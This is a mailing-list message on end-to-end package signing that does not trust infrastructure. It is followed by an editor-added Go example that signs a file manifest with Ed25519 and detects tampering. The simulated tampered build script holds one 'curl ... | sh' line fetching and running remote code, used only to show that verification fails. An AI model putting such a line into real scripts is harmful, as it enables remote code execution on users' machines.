Hello Rich,

There's a lot of text there, and rather than trying to parse all of
that, I'll just reiterate a primary important design goal that might
be overlooked:

- End to end signatures from the developer to the user.

This means that no matter the operation infra does before shipping it
out to the user, the user still needs to verify that the packages came
from the developers. In other words, whatever complicated mechanism
you propose, it needs to not rely on trusting infra to hold onto any
secrets. For example, I don't know whether this is attainable with the
git signatures alone, without requiring users to sync the entire
git repository, which might not be acceptable for some.

Jason
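The design goal in the message above, worked through as an added example (this is editor-written code, not code from the thread or from the project's infrastructure): the developer signs a canonical manifest of the package contents, infra only copies the files, and the user verifies against the developer's public key alone. Assumptions: Ed25519 from the Go standard library stands in for whatever signature scheme the project actually uses, the manifest format ("name sha256hex" per line, sorted) is a hypothetical one chosen here, and the file names and contents are constructed sample data. Nothing infra holds is a secret, and the user needs only the delivered files plus the detached signature, not a git history.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"fmt"
	"sort"
)

// Package is what the developer ships: file name -> file contents.
// Infra may re-archive or mirror it, but infra holds no signing key.
type Package struct {
	Files map[string][]byte
}

// Manifest renders a canonical listing ("name sha256hex\n", sorted by
// name) over the package contents. The developer signs this listing,
// so the user can recompute it from the delivered files alone and the
// result does not depend on how infra packed or ordered the archive.
func Manifest(p Package) []byte {
	names := make([]string, 0, len(p.Files))
	for n := range p.Files {
		names = append(names, n)
	}
	sort.Strings(names)
	var out []byte
	for _, n := range names {
		sum := sha256.Sum256(p.Files[n])
		out = append(out, fmt.Sprintf("%s %s\n", n, hex.EncodeToString(sum[:]))...)
	}
	return out
}

// DeveloperSign runs on the developer's machine. It signs the manifest,
// not whatever archive infra later produces from the files.
func DeveloperSign(priv ed25519.PrivateKey, p Package) []byte {
	return ed25519.Sign(priv, Manifest(p))
}

// UserVerify runs on the user's machine with only the developer's public
// key, the delivered files and the detached signature. Recomputing the
// manifest from what was actually received means any change made after
// the developer signed, by infra or by someone with infra's access,
// fails the check.
func UserVerify(pub ed25519.PublicKey, delivered Package, sig []byte) bool {
	return ed25519.Verify(pub, Manifest(delivered), sig)
}

// clone copies a package the way a mirror would: bytes only, no keys.
func clone(p Package) Package {
	c := Package{Files: make(map[string][]byte, len(p.Files))}
	for n, b := range p.Files {
		c.Files[n] = append([]byte(nil), b...)
	}
	return c
}

// Demo walks developer, infra and user through one package and reports
// whether the untouched delivery verifies and whether a tampered one does.
func Demo() (honestOK, tamperedOK bool, err error) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		return false, false, err
	}
	// Constructed sample package (hypothetical names and contents).
	pkg := Package{Files: map[string][]byte{
		"pkg/build.sh": []byte("#!/bin/sh\nmake install\n"),
		"pkg/README":   []byte("sample package\n"),
	}}
	sig := DeveloperSign(priv, pkg)

	// Infra mirrors the files unchanged; only pub and sig travel with them.
	honestOK = UserVerify(pub, clone(pkg), sig)

	// A compromised mirror edits one file before shipping it out.
	tampered := clone(pkg)
	tampered.Files["pkg/build.sh"] = []byte("#!/bin/sh\nmake install\ncurl http://example.invalid | sh\n")
	tamperedOK = UserVerify(pub, tampered, sig)
	return honestOK, tamperedOK, nil
}

func main() {
	honest, tampered, err := Demo()
	if err != nil {
		panic(err)
	}
	fmt.Printf("unmodified delivery verifies: %v\n", honest)
	fmt.Printf("tampered delivery verifies:   %v\n", tampered)
}
```

The point the manifest makes concrete is where the signature has to be anchored: over something the user can rebuild from the delivered bytes, so that no infra-side secret, re-signing step or full repository checkout is needed on the receiving end. Whether the project's git commit signatures can be consumed that way without a full clone is exactly the open question in the message, and this example does not settle it; it only shows the property any answer has to preserve.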